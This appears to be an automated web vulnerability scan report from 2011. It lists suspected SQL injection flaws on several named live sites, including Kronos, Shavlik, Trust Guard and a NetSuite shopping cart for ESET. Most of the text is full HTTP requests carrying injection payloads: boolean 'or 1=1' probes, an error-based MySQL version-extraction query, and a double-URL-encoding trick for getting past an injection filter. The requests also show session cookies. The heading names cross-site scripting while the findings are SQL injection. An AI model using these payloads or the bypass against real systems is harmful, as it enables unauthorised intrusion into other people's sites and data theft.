CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /user/managefavorites.asp?favurl=http://customer.kronos.com/SiteFeedbackForm.htm&t=Site HTTP/1.1
Host: customer.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1303741346229; s_lv=1303741346233; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1
Referer: http://www.google.com/search?hl=en&q='

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 25 Apr 2011 15:34:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5466
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=OOBNPBCAIBACFMIKJIFGNJJN; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
<font face="Arial" size=2>[Microsoft][ODBC SQL Server Driver][SQL Server]Procedure 'getFavorites' expects parameter '@UserID', which was not supplied.</font>
...[SNIP]...

1.2. http://learn.shavlik.com/shavlik/index.cfm [h parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. The payloads 52506121%20or%201%3d1--%20 and 52506121%20or%201%3d2--%20 were each submitted in the h parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shavlik/index.cfm?m=521&pg=372&h=052506121%20or%201%3d1--%20&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


...[SNIP]...









































































































































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik Free Antivirus Software Download</title>

<link rel="stylesheet" href="style/style2.css" type="text/css" media="all" />

   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {

           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }

           sWindowName = sWindowName || "newWindow";

           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);

           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);

           newWindow.focus();

           }


   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new Ac
...[SNIP]...

Request 2

GET /shavlik/index.cfm?m=521&pg=372&h=052506121%20or%201%3d2--%20&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


...[SNIP]...





































































































































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik Free Antivirus Software Download</title>

<link rel="stylesheet" href="style/style2.css" type="text/css" media="all" />

   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {

           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }

           sWindowName = sWindowName || "newWindow";

           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);

           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);

           newWindow.focus();

           }


   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new ActiveXObject("Microso
...[SNIP]...

1.3. http://learn.shavlik.com/shavlik/index.cfm [m parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Issue detail

The m parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the m parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))'&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND DMMESSAGE.userCompanyID = 21
               ORDER BY
               DMMESSAGE.ID' at line 7
</font>
...[SNIP]...

1.4. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://secure.trust-guard.com
Path:	/ResetPassword.php

Issue detail

The txtEmail parameter appears to be vulnerable to SQL injection attacks. The payloads 19563258'%20or%201%3d1--%20 and 19563258'%20or%201%3d2--%20 were each submitted in the txtEmail parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=sjhj47er2168q391qsf989a724
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 43

txtEmail=19563258'%20or%201%3d1--%20&btnSubmit=Submit&btnCancel=Cancel

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<title>Trust Guard Login</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>

</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">

<form id="content:content" method="post" style="margin:0px" action="index.php">
<br /><br />
<script type="text/javascript">

function validateForm()
{
var message;
var nouser = (!validatePresent(document.getElementById('txtEmail'),'msg_user'));
var nopass = (!validatePresent(document.getElementById('txtPassword'),'msg_pass'));
if (nouser && nopass)
message = 'Please enter a username and a password.';
else if (nouser)
message = 'Please enter a username.';
else if (nopass)
message = 'Please enter a password.';

...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3795
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<title>Reset Password</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>

</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">

<form method="post" style="margin:0px">

Enter you email address or site name below and click Submit and we will send you a new password<br />
<input id="txtEmail" name="txtEmail" type="text" value="19563258' or 1=2-- " style="width:300px" onblur="validatePresent(this,'msg_email');" /><br />
<div id="msg_email"> </div>
<span style="color:Red">
<span id='lblResult' >Could not find an account will the site 19563258' or 1=2-- .</span> </span>
<br />
<input id='btnSubmit' name='btnSubmit' type="submit" value="Submit"
onclick="return validatePresent(document.getElementById('php:txtEm
...[SNIP]...

1.5. http://shopping.netsuite.com/app/site/query/additemtocart.nl [NLPromocode cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://shopping.netsuite.com
Path:	/app/site/query/additemtocart.nl

Issue detail

The NLPromocode cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the NLPromocode cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_%2527; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=42&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:53:12 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1229872416:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 49047

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_%2527%2527; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=42&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:53:17 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -803915303:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54942

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...

1.6. http://shopping.netsuite.com/app/site/query/additemtocart.nl [NLVisitorId cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://shopping.netsuite.com
Path:	/app/site/query/additemtocart.nl

Issue detail

The NLVisitorId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the NLVisitorId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq%2527; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:50:31 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 233801274:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:31 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:31 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:31 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:31 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:31 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:31 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 213

document.write('Error\n');




<!-- Not logging slo
...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq%2527%2527; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 15:50:31 GMT
Server: Apache
Location: /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303743154006-383984&Submit.x=41&productId=5051&Submit.y=10&whence=
Expires: 0
NS_RTIMER_COMPOSITE: -1139576511:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:33 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:33 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:33 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:33 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:33 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:33 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

1.7. http://shopping.netsuite.com/app/site/query/additemtocart.nl [Submit.y parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://shopping.netsuite.com
Path:	/app/site/query/additemtocart.nl

Issue detail

The Submit.y parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Submit.y parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=42&Submit.y=10'&promocode=&c=438708&qtyadd=1

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:42:58 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1121558865:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 49062

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
